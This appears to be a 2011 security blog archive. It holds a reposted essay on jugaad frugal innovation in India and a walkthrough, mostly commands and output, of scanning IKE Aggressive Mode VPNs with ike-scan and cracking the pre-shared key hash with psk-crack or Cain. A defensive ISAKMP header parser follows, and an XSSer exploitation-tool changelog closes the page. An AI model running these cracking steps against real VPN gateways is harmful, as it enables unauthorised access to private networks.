Friday, December 9, 2011

Use Jugaad to Innovate Faster, Cheaper, Better

This is not a techie post, but I just loved what the post author had to say. A grand shout-out to jugaad innovators.

We recently attended the World Economic Forum's India Economic Summit 2011 in Mumbai, where we moderated several panels and workshops on the topic of innovation. The experience gave us some insights into a unique approach to innovation called jugaad, which entrepreneurs and enterprises are practicing in complex emerging markets like India.

Jugaad is a Hindi word that loosely translates as "the gutsy art of overcoming harsh constraints by improvising an effective solution using limited resources." Jugaad is an antidote to the complexity of India: a country of mind-boggling diversity; pervasive scarcity of all kinds; and exploding interconnectivity (India is adding 10 million cellphone subscribers every month).

This highly resource-constrained and chaotic environment inspires jugaad innovators — i.e., the Indian entrepreneurs and corporations who practice jugaad to develop market-relevant products and services that are inherently affordable and sustainable. Jugaad innovators are modern-day alchemists who transmute adversity into opportunity, and in so doing create value for their organizations and communities. And while we first learned about jugaad while conducting field research in India over the past several years, we've found that jugaad innovators exist around the world, including right here in the U.S.

There are three aspects of jugaad that make it particularly effective. Specifically:

Jugaad innovators innovate faster: Jugaad innovators don't use linear, pre-planned, time-consuming R&D processes. Rather, they rely heavily on rapid prototyping techniques — i.e., they collaborate intimately with customers and use their constant feedback to zero in on the most relevant product features. For instance, Jane Chen and Rahul Panicker, Stanford graduates and co-founders of Embrace, worked closely with village pediatricians and patients in rural India to iteratively optimize the design of their breakthrough portable infant warmer — which costs less than 5% of incubators sold in the West (which are typically priced around $20,000).

Jugaad innovators innovate cheaper: Jugaad innovators are very frugal. Rather than reinventing the wheel or splurging on expensive R&D projects, they develop new solutions by building upon existing infrastructure and assets, as well as by recombining existing solutions. In doing so, they can pass the cost savings on to their customers. For instance, YES Bank, one of India's leading private banks, has deployed a mobile payment solution that enables money transfer via cellphones without the need for a bank account. This solution piggybacks on India's existing robust mobile telephony infrastructure that extends to the remotest of villages in India (a country where nearly 870 million people have cellphones, but 600 million or so do not have a bank account).

Jugaad innovators innovate better: Jugaad innovators recognize that consumers in emerging markets are low earners, but high yearners. As such, jugaad innovators attempt to meet customers' high aspirations by developing solutions that are not only affordable, but that also deliver superior value. In sum, they strive to deliver more (value) for less (cost). Take, for instance, SELCO, an Indian renewable energy firm founded by the U.S.-educated Harish Hande. Recognizing the diverse needs of the Indian rural population, SELCO set out to personalize the value proposition of its solar lanterns to individual customers — be they a village midwife who doesn't want the toxic fumes of a kerosene lamp polluting her patient's environment; a rosebud collector looking for a modular lighting solution that can be repaired quickly in a remote location; or a vegetable seller who doesn't want to contend with the electrical outages that are typical across India. As a result, more than 115,000 rural customers now use SELCO's solar lanterns — not only because they are affordable, but because they deliver superior value by addressing customers' unique needs.

What makes jugaad innovators so adept at innovating faster, cheaper, and better? The answer lies in their unique mindset — characterized by two key attributes: adaptability and inclusivity.

Jugaad innovators are highly adaptable: Indian entrepreneurs who practice jugaad are a resilient bunch: they continually find ways to bounce back from the adversity that permeates every aspect of their lives. Jugaad innovators sense and respond to rapid changes in their environment by dynamically reinventing their business models. For instance, Chen and Panicker, co-founders of Embrace, initially set out to design a fixed incubator at a low-cost — but once they discovered that Indian village women preferred to hold their newborn babies close to their bodies, they quickly adapted their business model around a portable infant warmer.

Jugaad innovators are inclusive: In India, more than 800 million citizens lack access to healthcare, 600 million are unbanked, and 400 million live off the electricity grid. While most corporations view these marginal segments as being unprofitable, jugaad innovators like YES Bank's Rana Kapoor and SELCO's Harish Hande have invented inclusive business models for profitably serving the millions who live on the margins of society. For these entrepreneurs, including the margin not only provides for greater social good, it also makes great business sense.

Interestingly, we have noticed that jugaad is practiced not only by Indian entrepreneurs and corporations, but also by some pioneering multinationals in India. Take GE Healthcare, for instance, which used the flexible jugaad mindset to make high-quality cancer diagnosis and treatment accessible to underdeveloped communities across India. Until recently, India had been importing the radioisotopes required for nuclear imaging such as PET/CT scans. This was not only unaffordable for many rural hospitals, it was ineffective because the radioisotopes decay over time (in hours or even minutes), so they need to be administered to the patient soon after they're produced. GE Healthcare partnered with private diagnostic centers and airline companies to locally produce radioisotopes — and make deliveries on a just-in-time basis to small-town hospitals around the country. Now, with GE Healthcare's frugal "pay-per-use" pricing model and just-in-time delivery mechanism, the supply of radioisotopes has become affordable and dependable for many rural hospitals.

The jugaad mindset — and its associated principles and practices — is increasingly relevant for companies worldwide who are seeking to grow in an increasingly complex and resource-constrained business environment. Unlike traditional, structured innovation methods that rely on time-consuming and expensive R&D processes, the more fluid jugaad approach delivers speed, agility, and cost efficiencies. Jugaad is a "bottom up" innovation approach that provides organizations in both emerging and developed economies the key capabilities they need to succeed in a hypercompetitive and fast-moving world: frugality, inclusivity, collaboration, and adaptability.

Aggressive Mode VPN -- IKE-Scan, PSK-Crack, and Cain

The Carnal0wnage blog has this nice article about hacking into IPsec tunnels in aggressive mode.


There hasn't been much in the way of updates on breaking into VPN servers that have aggressive mode enabled.

ike-scan is probably still your best bet.

If you have no idea what I'm talking about, go read these:
http://www.sersc.org/journals/IJAST/vol8/2.pdf and
http://www.radarhack.com/dir/papers/Scanning_ike_with_ikescan.pdf

In IKE Aggressive Mode, the authentication hash based on a preshared key (PSK) is transmitted as a response to the initial packet of a VPN client that wants to establish an IPsec tunnel (Hash_R). This hash is not encrypted. It's possible to capture these packets using a sniffer, for example tcpdump, and start a dictionary or brute-force attack against this hash to recover the PSK.

This attack only works in IKE Aggressive Mode because in IKE Main Mode the hash is already encrypted. Based on such facts, IKE Aggressive Mode is not very secure.

It looks like this:
$ sudo ike-scan 192.168.207.134
Starting ike-scan 1.9 with 1 hosts (http://www.nta-monitor.com/tools/ike-scan/)

192.168.207.134 Notify message 14 (NO-PROPOSAL-CHOSEN) HDR=(CKY-R=f320d682d5c73797)
Ending ike-scan 1.9: 1 hosts scanned in 0.096 seconds (10.37 hosts/sec).
0 returned handshake; 1 returned notify

$ sudo ike-scan -A 192.168.207.134
Starting ike-scan 1.9 with 1 hosts (http://www.nta-monitor.com/tools/ike-scan/)

192.168.207.134 Aggressive Mode Handshake returned HDR=(CKY-R=f320d6XXXXXXXX) SA=(Enc=3DES Hash=MD5 Group=2:modp1024 Auth=PSK LifeType=Seconds LifeDuration=28800) VID=12f5f28cXXXXXXXXXXXXXXX (Cisco Unity) VID=afcad71368a1XXXXXXXXXXXXXXX(Dead Peer Detection v1.0) VID=06e7719XXXXXXXXXXXXXXXXXXXXXX VID=090026XXXXXXXXXX (XAUTH) KeyExchange(128 bytes) ID(Type=ID_IPV4_ADDR, Value=192.168.207.134) Nonce(20 bytes) Hash(16 bytes)
To save the output to a file:
$ sudo ike-scan -A 192.168.207.134 --id=myid -P192-168-207-134key
Once you have your PSK file to crack, you're stuck with two options: psk-crack and Cain.

psk-crack is fairly rudimentary.

To brute force:

$ psk-crack -b 5 192-168-207-134key
Running in brute-force cracking mode
Brute force with 36 chars up to length 5 will take up to 60466176 iterations

no match found for MD5 hash 5c178d[SNIP]
Ending psk-crack: 60466176 iterations in 138.019 seconds (438099.56 iterations/sec)
The default charset is "0123456789abcdefghijklmnopqrstuvwxyz" and can be changed with --charset=
$ psk-crack -b 5 --charset="01233456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz" 192-168-207-134key
Running in brute-force cracking mode
Brute force with 63 chars up to length 5 will take up to 992436543 iterations
To run a dictionary attack:

$ psk-crack -d /path/to/dictionary 192-168-207-134key
Running in dictionary cracking mode

no match found for MD5 hash 5c178d[SNIP]
Ending psk-crack: 14344876 iterations in 33.400 seconds (429483.14 iterations/sec)
You may find yourself wanting a bit more flexibility or options during brute-forcing or dictionary attacking (i.e. character substitution). For this you'll need to use Cain. The problem I ran into was that Cain is a Windows tool and ike-scan is *nix. I couldn't get the Windows tool that is floating around to work. Solution... run in VMware and have Cain sniff on your VMware interface. The PSK should show up in the passwords of the sniffer tab, then you can select and "send to cracker". It's slow as hell, but more options than psk-crack.
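The defensive counterpart to the quoted post is spotting the condition it describes on your own network: an IKEv1 Aggressive Mode exchange whose payloads are not encrypted, which is the only case where the PSK-derived HASH_R crosses the wire in the clear (Main Mode sets the encryption flag before the hash is sent). The following parser is an added example, not code from the quoted post or from ike-scan; it assumes you have already extracted the UDP/500 payload (for instance with tcpdump, as the post suggests) and works only on the fixed 28-byte ISAKMP header from RFC 2408. The sample packets are constructed, not captured.

```python
import struct

# IKEv1 Phase 1 exchange types from RFC 2408 section 3.1
EXCHANGE_TYPES = {2: "Identity Protection (Main Mode)", 4: "Aggressive"}
ISAKMP_HDR_LEN = 28      # fixed header size in bytes
ENCRYPTION_FLAG = 0x01   # flags bit set when the payloads after the header are encrypted


def parse_isakmp_header(data):
    """Decode the fixed ISAKMP header at the start of a UDP/500 payload."""
    if len(data) < ISAKMP_HDR_LEN:
        raise ValueError("truncated ISAKMP header")
    fields = struct.unpack("!8s8sBBBBII", data[:ISAKMP_HDR_LEN])
    i_cookie, r_cookie, _next_payload, version, exch, flags, _msg_id, length = fields
    return {
        "initiator_cookie": i_cookie.hex(),
        "responder_cookie": r_cookie.hex(),
        "major_version": version >> 4,          # high nibble of the version byte
        "exchange_type": exch,
        "exchange_name": EXCHANGE_TYPES.get(exch, "other (%d)" % exch),
        "encrypted": bool(flags & ENCRYPTION_FLAG),
        "length": length,
    }


def is_cleartext_aggressive(hdr):
    """IKEv1 Aggressive Mode message whose payloads are not encrypted; the responder's
    reply in that exchange (both cookies set) is the one carrying HASH_R."""
    return hdr["major_version"] == 1 and hdr["exchange_type"] == 4 and not hdr["encrypted"]


def build_header(i_cookie, r_cookie, exch, flags, length):
    """Constructed IKEv1 header (version 1.0, next payload SA) for the samples below."""
    return struct.pack("!8s8sBBBBII", i_cookie, r_cookie, 1, 0x10, exch, flags, 0, length)


# Constructed sample payloads: a Main Mode first message (responder cookie still zero),
# an Aggressive Mode responder reply, and an encrypted Main Mode message after the DH step.
SAMPLE_PACKETS = {
    "main_mode_msg1": build_header(b"\x11" * 8, b"\x00" * 8, 2, 0x00, 100),
    "aggr_mode_reply": build_header(b"\x11" * 8, b"\x22" * 8, 4, 0x00, 300),
    "main_mode_encrypted": build_header(b"\x11" * 8, b"\x22" * 8, 2, 0x01, 120),
}


def flag_cleartext_aggressive(packets):
    """Return the names of packets that would expose a PSK hash on the wire."""
    return sorted(name for name, raw in packets.items()
                  if is_cleartext_aggressive(parse_isakmp_header(raw)))
```

Any hit from flag_cleartext_aggressive on a production capture means a gateway is negotiating Aggressive Mode with PSK-style authentication, and the fix is on the gateway (disable Aggressive Mode or move to certificate authentication), not on the sniffer.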


Thursday, December 1, 2011

XSSer v.1.6 BETA Released

Cross Site "Scripter" is an automatic -framework- to detect, exploit and report XSS vulnerabilities in web-based applications. It contains several options to try to bypass certain filters, and various special techniques of code injection.

Changelog:

Core:
+ Added Drop Cookie option
+ Added Random IP X-Forwarded-For and X-Client-IP option
+ Added GSS and NTLM authentication methods
+ Added Ignore proxy option
+ Added TCP-NODELAY option
+ Added Follow redirects option
+ Added Follow redirects limiter parameter
+ Added Auto-HEAD precheck system
+ Added No-HEAD option
+ Added Isalive option
+ Added Check at url option (Blind XSS)
+ Added Reverse Check parameter
+ Added PHPIDS (v.0.6.5) exploit
+ Added More vectors to auto-payloading
+ Added HTML5 studied vectors
+ Fixed Different bugs on core
+ Fixed Curl handlerer options
+ Fixed Dorkerers system
+ Fixed Bugs on results propagation
+ Fixed POST requests

GTK:
+ Added New features to GTK controller
+ Added Detailed views to GTK interface


Download: http://xsser.sourceforge.net